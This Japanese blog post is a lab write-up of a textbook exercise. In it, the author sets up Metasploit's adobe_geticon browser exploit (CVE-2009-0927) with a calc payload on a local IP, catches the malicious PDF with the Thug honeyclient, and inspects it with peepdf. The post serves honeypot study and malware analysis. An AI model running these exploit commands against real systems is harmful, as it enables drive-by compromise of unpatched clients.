「サイバーセキュリティモニタリング(攻撃と侵入編) - あしのあしあと」の続き。3 章の章末問題【1】をやる。今回も、本編の類題。リハビリにはうってつけ。「今度こそ余裕」と思っていた。確かに、本編のハンズオンは、うまくいった。しかし、章末問題が。。
ハニーポットは、「低対話型ハニークライアント」である Thug を使って構築する。
ごめんなさい。聞いたことすらなかったです。しかし、名前。。
まずは、(a) をやってみる。ワナのサイトは、Kali Linux の方で立ち上げる。
Metasploit で「adobe_geticon」を検索すると、2 件ヒットする。Name「exploit/windows/fileformat/adobe_geticon」は、pdf ファイルを作成するだけなので、違うなと。なので、Name「exploit/windows/browser/adobe_geticon」を対象にした。
$ msfconsole search adobe_geticon use exploit/windows/browser/adobe_geticon show targets set TARGET 0 show options set SRVHOST 192.168.1.5 set URIPATH /adobe_geticon set PAYLOAD windows/exec set CMD calc exploit
ワナできたよ。お次は、ハニークライアント。REMnux に Thug が同梱されているので、これを使うよ。
そして、Windows XP に IE 6.0 および Acrobat Reader 7.0 が入っているように見せかける。準備ができたので、満を持して、ワナを踏む。
$ thug.py -u winxpie60 -A 7.0.0 -F -Z http://192.168.1.5:8080/adobe_geticon [2017-03-18 16:54:39] [window open redirection] about:blank -> http://192.168.1.5:8080/adobe_geticon [2017-03-18 16:54:39] [HTTP] URL: http://192.168.1.5:8080/adobe_geticon (Status: 200, Referer: None) [2017-03-18 16:54:39] [HTTP] URL: http://192.168.1.5:8080/adobe_geticon (Content-type: application/pdf, MD5: b25b5c32911445483cfb241607c171a6) [2017-03-18 16:54:39] Thug analysis logs saved at /var/log/thug/logs/ae9cafb5c4b490545459fe2432366b5b/20170318165439
おぉ、PDF ファイルが取れ、ログも出力したみたいだ。ログを見てみると...
$ cd /var/log/thug/logs/ae9cafb5c4b490545459fe2432366b5b/20170318165439 $ cd analysis/json $ less analysis.json ... snip ... "behavior": [ { "timestamp": "2017-03-18 16:54:39.675509", "cve": "None", "description": "[window open redirection] about:blank -> http://192.168.1.5:8080/adobe_geticon", "method": "Dynamic Analysis" }, { "timestamp": "2017-03-18 16:54:39.676161", "cve": "None", "description": "about:blank -- window open --> http://192.168.1.5:8080/adobe_geticon", "method": "Dynamic Analysis" }, { "timestamp": "2017-03-18 16:54:39.740234", "cve": "None", "description": "[HTTP] URL: http://192.168.1.5:8080/adobe_geticon (Status: 200, Referer: None)", "method": "Dynamic Analysis" }, { "timestamp": "2017-03-18 16:54:39.741835", "cve": "None", "description": "[HTTP] URL: http://192.168.1.5:8080/adobe_geticon (Content-type: application/pdf, MD5: b25b5c32911445483cfb241607c171a6)", "method": "Dynamic Analysis" } ], ... snip ...
あれ? CVE の番号が、わからない。。thug.py の引数を変えて、何度もやってみたけど、ダメ。またダメなの?
めげずに、先走って (b) をやってみる。peepdf を使って、先ほど取得した、悪性 PDF ファイルを、構造解析する。
$ peepdf -f -l b25b5c32911445483cfb241607c171a6 File: b25b5c32911445483cfb241607c171a6 MD5: b25b5c32911445483cfb241607c171a6 SHA1: 878df65ffa961351f275d1df044fbcd2851c4802 ... snip ... Version 0: Catalog: 1 Info: No Objects (6): [1, 2, 3, 4, 5, 6] Errors (1): [6] Streams (1): [6] Encoded (1): [6] Objects with JS code (1): [6] Suspicious elements: /OpenAction: [1] /JS: [5] /JavaScript: [5] getIcon (CVE-2009-0927): [6]
6 番目のオブジェクトが、圧縮されたストリームオブジェクト。ここに、CVE-2009-0927 を悪用する JavaScript が含まれているっぽい。一応、ファイルに保存しておく。
$ peepdf -f -l -i b25b5c32911445483cfb241607c171a6 PPDF> object 6 > object6_file
心残りではあるが、ハマりそうなので、ひとまず 3 章の章末問題【1】は、これくらいにしておく。なんたって、時間が足りない。